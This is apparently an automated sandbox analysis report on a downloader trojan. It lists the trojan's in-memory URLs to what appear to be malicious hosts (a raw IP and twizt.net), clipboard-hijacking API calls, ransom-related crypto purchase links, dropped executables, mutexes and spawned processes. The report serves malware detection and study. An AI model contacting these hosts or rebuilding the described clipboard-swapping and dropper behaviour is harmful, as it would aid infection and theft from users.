Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/_2yk
Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/_3
Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/_3yh
Source: sysbrapsvc.exe, 00000002.00000002.3866327336.0000000004780000.00000004.00000020.00020000.00000000.sdmp, 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | String found in binary or memory: http://icanhazip.com/
Source: sysbrapsvc.exe, 00000002.00000002.3866327336.0000000004780000.00000004.00000020.00020000.00000000.sdmp, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | String found in binary or memory: http://icanhazip.com/.
Source: 3193211493.exe.2.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 3193211493.exe.2.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 330125677.exe, 0000000F.00000002.2003173720.00000000005B5000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe, 0000000F.00000002.2003173720.000000000059D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/
Source: 330125677.exe, 330125677.exe, 0000000F.00000002.2003173720.000000000059D000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe, 0000000F.00000000.1953132722.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp, 330125677.exe, 0000000F.00000002.2003173720.000000000055E000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe, 0000000F.00000002.2003454543.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp, 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe.2.dr | String found in binary or memory: http://twizt.net/ALLSTATA
Source: 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/ALLSTATA7a
Source: 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/ALLSTATAWaIG2
Source: 330125677.exe, 0000000F.00000002.2003173720.000000000055E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/ALLSTATAnt
Source: 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/ALLSTATAo
Source: 330125677.exe, 0000000F.00000000.1953132722.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp, 330125677.exe, 0000000F.00000002.2003454543.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp, 330125677.exe.2.dr | String found in binary or memory: http://twizt.net/ALLSTATAopen%temp%%s
Source: 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | String found in binary or memory: https://bitpay.com/buy-bitcoin/?crypto=BTC
Source: 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | String found in binary or memory: https://cex.io/buy-bitcoins
Source: 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | String found in binary or memory: https://invity.io/buy-crypto
Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000003.1794455255.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000003.1794598121.00000000006D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com405117-2476756634-1002LMEM
Source: 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | String found in binary or memory: https://nexo.com/buy-crypto/bitcoin-btc
Source: 2006625995.exe, 2006625995.exe, 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe, 0000000A.00000000.1869234828.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp, 2006625995.exe.2.dr | String found in binary or memory: https://paybis.com/
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA

                            Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, type: SAMPLE
Source: Yara match | File source: 5.0.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1395571963.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.1558944525.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1416106928.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.1544428131.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1665949097.0000000004781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1416145697.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe PID: 6832, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysbrapsvc.exe PID: 5588, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysbrapsvc.exe PID: 768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 3193211493.exe PID: 3640, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\sysbrapsvc.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\3193211493.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Code function: 7_2_00DB1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,RtlAllocateHeap,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,FindCloseChangeNotification,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Code function: 7_2_00DB1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey
Source: C:\Users\user\winploravr.exe | Code function: 9_2_002A1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey
Source: C:\Users\user\winploravr.exe | Code function: 9_2_002A1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey
Source: C:\Windows\winploravr.exe | Code function: 14_2_000F1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey
Source: C:\Windows\winploravr.exe | Code function: 14_2_000F1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey
Source: C:\Windows\sysbrapsvc.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_0040D950 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_0040F589 NtQueryVirtualMemory
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_0040D950 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_0040F589 NtQueryVirtualMemory
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_0040D950 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_0040F589 NtQueryVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_0040D950 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_0040F589 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | File created: C:\Windows\sysbrapsvc.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File created: C:\Windows\winploravr.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00404090
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_004048A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_0040F34C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00407FD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00407FF9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_0040A9B0
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_00404090
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_004048A0
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_0040F34C
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_00407FD0
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_00407FF9
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_0040A9B0
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_00404090
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_004048A0
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_0040F34C
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_00407FD0
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_00407FF9
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_0040A9B0
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_00404090
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_004048A0
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_0040F34C
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_00407FD0
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_00407FF9
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_0040A9B0
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\1146722911.exe FB11B4E2D26812E26EA7428F3B0B9BB8A16814188250FA60697C7AEC40A49BD0
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\1245832676.exe 8A169CF165F635ECB6C55CACECB2C202C5FC6EF5FA82EC9CDB7D4B0300F35293
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\2006625995.exe F63C124598C87BED71A1E5E6EC5A04E8AA2F18F94B21D690513C5490F7F85991
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\2303012543.exe 8A169CF165F635ECB6C55CACECB2C202C5FC6EF5FA82EC9CDB7D4B0300F35293
Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.evad.winEXE@23/24@3/57
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00406B50 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00407250 CoCreateInstance
Source: C:\Windows\sysbrapsvc.exe | File created: C:\Users\user\tbtnds.dat
Source: C:\Windows\sysbrapsvc.exe | Mutant created: \Sessions\1\BaseNamedObjects\b7x663937xa
Source: C:\Users\user\AppData\Local\Temp\2006625995.exe | Mutant created: \Sessions\1\BaseNamedObjects\4463464*
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Mutant created: \Sessions\1\BaseNamedObjects\xouauxuax
Source: C:\Windows\sysbrapsvc.exe | File created: C:\Users\user\AppData\Local\Temp\3193211493.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Command line argument: xouauxuax (7_2_00DB1840)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Command line argument: uxuax (7_2_00DB1840)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Command line argument: winploravr.exe (7_2_00DB1840)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Command line argument: %windir% (7_2_00DB1840)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Command line argument: %s\%s (7_2_00DB1840)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Command line argument: %userprofile% (7_2_00DB1840)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Command line argument: %s\%s (7_2_00DB1840)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Command line argument: UpdatesOverride (7_2_00DB1840)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Command line argument: %s%s (7_2_00DB1840)
Source: C:\Users\user\winploravr.exe | Command line argument: xouauxuax (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: uxuax (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: winploravr.exe (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: 46* (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: L6* (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: d6* (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: h6* (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: l6* (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: %windir% (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: %s\%s (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: %userprofile% (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: %s\%s (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: UpdatesOverride (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: d6*h6*l6* (9_2_002A1840)
Source: C:\Users\user\winploravr.exe | Command line argument: %s%s (9_2_002A1840)
Source: C:\Users\user\AppData\Local\Temp\2006625995.exe | Command line argument: 4463464* (10_2_00D72720)
Source: C:\Windows\winploravr.exe | Command line argument: xouauxuax (14_2_000F1840)
Source: C:\Windows\winploravr.exe | Command line argument: uxuax (14_2_000F1840)
Source: C:\Windows\winploravr.exe | Command line argument: winploravr.exe (14_2_000F1840)
Source: C:\Windows\winploravr.exe | Command line argument: %windir% (14_2_000F1840)
Source: C:\Windows\winploravr.exe | Command line argument: %s\%s (14_2_000F1840)
Source: C:\Windows\winploravr.exe | Command line argument: %userprofile% (14_2_000F1840)
Source: C:\Windows\winploravr.exe | Command line argument: %s\%s (14_2_000F1840)
Source: C:\Windows\winploravr.exe | Command line argument: UpdatesOverride (14_2_000F1840)
Source: C:\Windows\winploravr.exe | Command line argument: %s%s (14_2_000F1840)
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Command line argument: 0"? (18_2_003F10A0)
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Command line argument: d"? (18_2_003F10A0)
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Command line argument: \#? (18_2_003F10A0)
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Command line argument: WinCfgMgr (18_2_003F10A0)
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Command line argument: \$? (18_2_003F10A0)
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Command line argument: (%? (18_2_003F10A0)
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Command line argument: `%? (18_2_003F10A0)
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Command line argument: 0&? (18_2_003F10A0)
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Command line argument: h&? (18_2_003F10A0)
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Command line argument: @'? (18_2_003F10A0)
Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Process created: C:\Windows\sysbrapsvc.exe C:\Windows\sysbrapsvc.exe
Source: unknown | Process created: C:\Windows\sysbrapsvc.exe "C:\Windows\sysbrapsvc.exe"
Source: C:\Windows\sysbrapsvc.exe | Process created: C:\Users\user\AppData\Local\Temp\3193211493.exe C:\Users\user\AppData\Local\Temp\3193211493.exe
Source: C:\Windows\sysbrapsvc.exe | Process created: C:\Users\user\AppData\Local\Temp\1146722911.exe C:\Users\user\AppData\Local\Temp\1146722911.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Process created: C:\Users\user\AppData\Local\Temp\2303012543.exe C:\Users\user\AppData\Local\Temp\2303012543.exe
Source: unknown | Process created: C:\Users\user\winploravr.exe "C:\Users\user\winploravr.exe"
Source: C:\Windows\sysbrapsvc.exe | Process created: C:\Users\user\AppData\Local\Temp\2006625995.exe C:\Users\user\AppData\Local\Temp\2006625995.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Process created: C:\Users\user\AppData\Local\Temp\2711236308.exe C:\Users\user\AppData\Local\Temp\2711236308.exe
Source: unknown | Process created: C:\Windows\winploravr.exe "C:\Windows\winploravr.exe"
Source: C:\Windows\sysbrapsvc.exe | Process created: C:\Users\user\AppData\Local\Temp\330125677.exe C:\Users\user\AppData\Local\Temp\330125677.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Process created: C:\Users\user\AppData\Local\Temp\1245832676.exe C:\Users\user\AppData\Local\Temp\1245832676.exe
Source: unknown | Process created: C:\Users\user\winploravr.exe "C:\Users\user\winploravr.exe"
Source: C:\Windows\sysbrapsvc.exe | Process created: C:\Users\user\AppData\Local\Temp\300129380.exe C:\Users\user\AppData\Local\Temp\300129380.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Process created: C:\Windows\sysbrapsvc.exe C:\Windows\sysbrapsvc.exe
Source: C:\Windows\sysbrapsvc.exe | Process created: C:\Users\user\AppData\Local\Temp\3193211493.exe C:\Users\user\AppData\Local\Temp\3193211493.exe
Source: C:\Windows\sysbrapsvc.exe | Process created: C:\Users\user\AppData\Local\Temp\1146722911.exe C:\Users\user\AppData\Local\Temp\1146722911.exe
Source: C:\Windows\sysbrapsvc.exe | Process created: C:\Users\user\AppData\Local\Temp\2006625995.exe C:\Users\user\AppData\Local\Temp\2006625995.exe
Source: C:\Windows\sysbrapsvc.exe | Process created: C:\Users\user\AppData\Local\Temp\330125677.exe C:\Users\user\AppData\Local\Temp\330125677.exe
Source: C:\Windows\sysbrapsvc.exe | Process created: C:\Users\user\AppData\Local\Temp\300129380.exe C:\Users\user\AppData\Local\Temp\300129380.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Process created: C:\Users\user\AppData\Local\Temp\2303012543.exe C:\Users\user\AppData\Local\Temp\2303012543.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Process created: C:\Users\user\AppData\Local\Temp\2711236308.exe C:\Users\user\AppData\Local\Temp\2711236308.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Process created: C:\Users\user\AppData\Local\Temp\1245832676.exe C:\Users\user\AppData\Local\Temp\1245832676.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Section loaded: ntmarta.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: apphelp.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: urlmon.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: wininet.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: iertutil.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: srvcli.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: netutils.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: uxtheme.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: mswsock.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: napinsp.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: wshbth.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: nlaapi.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: dnsapi.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: winrnr.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: sspicli.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: windows.storage.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: wldp.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: profapi.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: winhttp.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: winnsi.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: firewallapi.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: fwbase.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: urlmon.dll
Source: C:\Windows\sysbrapsvc.exe | Section loaded: wininet.dll
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: netutils.dllJump to behavior
